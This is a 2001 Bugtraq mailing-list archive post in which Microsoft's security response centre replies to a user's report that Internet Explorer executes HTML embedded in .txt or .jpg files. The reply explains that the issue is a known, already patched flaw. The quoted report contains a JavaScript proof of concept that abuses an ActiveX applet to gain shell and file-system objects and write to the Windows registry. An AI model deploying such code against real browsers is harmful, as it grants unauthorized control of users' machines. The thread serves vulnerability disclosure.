Hi All - We investigated this report when we received it on 20 July, and reported our findings to the author. The short answer is that there doesn't appear to be anything new here. However, because the report mixes references to several different issues, it can be difficult to see why this is. * The Javascript listing below does indeed exploit a vulnerability. However, it's a known vulnerablity for which a patch has been available since October 2000. The issue is discussed in Microsoft Security Bulletin MS00-075 (http://www.microsoft.com/technet/security/bulletin/MS00-075.asp). * If script were included within a .txt, .jpg or other file and hosted on a web site, it could be opened automatically by a page on the site. However, the script would run in the web page's domain, so it would be subject to all the same limitations as script on the page itself. That is, embedding the script within the file wouldn't gain the attacker any capabilities. * If a user could be convinced to download a .txt, .jpg or other file to the desktop and then open it, either of two effects would result, depending on the file type. Most file types don't open in IE by default. For instance, .txt files open in Notepad by default. In these cases, the script in the file wouldn't run. Other file types, principally image files, do open in IE by default. However, when they're opened from the local machine, they're sent directly to the image rendering engine in IE, bypassing the script parser. Once again, the script wouldn't run. * Attached files in email are handled the same as downloaded files. So again, either the file would open by default in a program other than IE, or would open in a way that bypasses the script interpreter. Hope that helps explain the situation. Regards, Scott Culp Security Program Manager Microsoft Security Response Center -----Original Message----- From: cr4zybird [mailto:cr4zybirdat_private] Sent: Friday, July 27, 2001 3:07 PM To: bugtraqat_private Subject: TXT or HTML? -- IE NEW BUG TXT or HTML? -- IE NEW BUG vulnerable programs: IE4 ,IE5 ,IE5,IE6 ,Microsoft Word ,Microsoft Excel,Microsoft PowerPoint, Tencent explorer (I've tested all the versions of IE that i can find, they are all vulnerable) description: IE doesn't recognize the extensions of files, which may contain some html code. Write a HTML file on NOTEPAD. save it as *.txt. upload to any server.then use IE to visit this page.Found: IE excuted the HTML code which contained in *.txt files. and we can also change the extension, like *.jpg or other non-downloaded files.finally i found that IE can't recognize the extension of a file. using this bug, anyone who knows how to make webpages can successfully attack other people. because of user's generic thought, they think only .html/.htm can be used to attack, but now, even .txt.jpg.png can do everything that a hmtl page can do! even the e-mail attachment! because outlook express is vulnerable, too. treat it seriously please. Due to the company's not wanting to be responsible for this bug, please, take it seriously, and be aware. here is a source code, just to prove the existence of this new bug. <SCRIPT Language="JavaScript" type="text/javascript"> <!-- document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLE T>"); function f(){ try { //ActiveX initialization a1=document.applets[0]; a1.setCLSID("{F935DC22-1CF0-11D0-ADB9- 00C04FD58A0B}"); a1.createInstance(); Shl = a1.GetObject(); a1.setCLSID("{0D43FE01-F093-11CF-8940- 00A0C9054228}"); a1.createInstance(); FSO = a1.GetObject(); a1.setCLSID("{F935DC26-1CF0-11D0-ADB9- 00C04FD58A0B}"); a1.createInstance(); Net = a1.GetObject(); try { if (document.cookie.indexOf("Chg") == -1) { Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "it's a good day to die!"); Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "it's a good day to die!"); var expdate = new Date((new Date()).getTime() + (1)); document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;" } } catch(e) {} } catch(e) {} } function init() { setTimeout("f()", 1000); } init(); // --> </SCRIPT> <img src=http://www.gnu.org/graphics/gnu-head- sm.jpg> it's a .jpg which may change your IE title(you have to change the extension to *.jpg first) non-vulnerable programs: netscape solutions: 1) download some antivirus softwares. and update the virus datebase all the time. and change the name of some 'dangerous' programs in your system, such as format.exe deltree.exe etc. i.e change format.exe to format_0.com etc. 2) try, not to visit those so- called 'hacker'or'cracking'sites. most of the time, you are the victim while you want to learn to attack others. 3) if you have to go visit some site that you are not quite sure if they are safe. then check it here first: http://crazybird.51.net/look.htm or you can also save the source code of this page to your computer, then save it as *.htm, so you can execute it on your own comp. be aware if it says "the web page contains some unsafe ActiveX" or something like that, then you'd better not to execute that ActiveX widget. and i can't promise that it can give you this kind of warn for any aggressive files.. 4) DO NOT open your attachment in IE!!!!!don't ever open any type of file in IE directly!!!BE AWARE!! you'd better use antivirus to scan it before you open it after you've download it to ur computer. 5) Update the system patch immediately if the patch comes out. if you still have quesitions, mail to: cr4zybirdat_private thanks to: springcream, skywind, nETMONKEY, xiajian, Nancy. they've gave me a lot of help on testing and communicatin with Microsoft by: crazybird cr4zybirdat_private IRC: irc.sunnet.org 6667 #CNFORCE 26/7/01 China
This archive was generated by hypermail 2b30 : Sun Jul 29 2001 - 20:51:52 PDT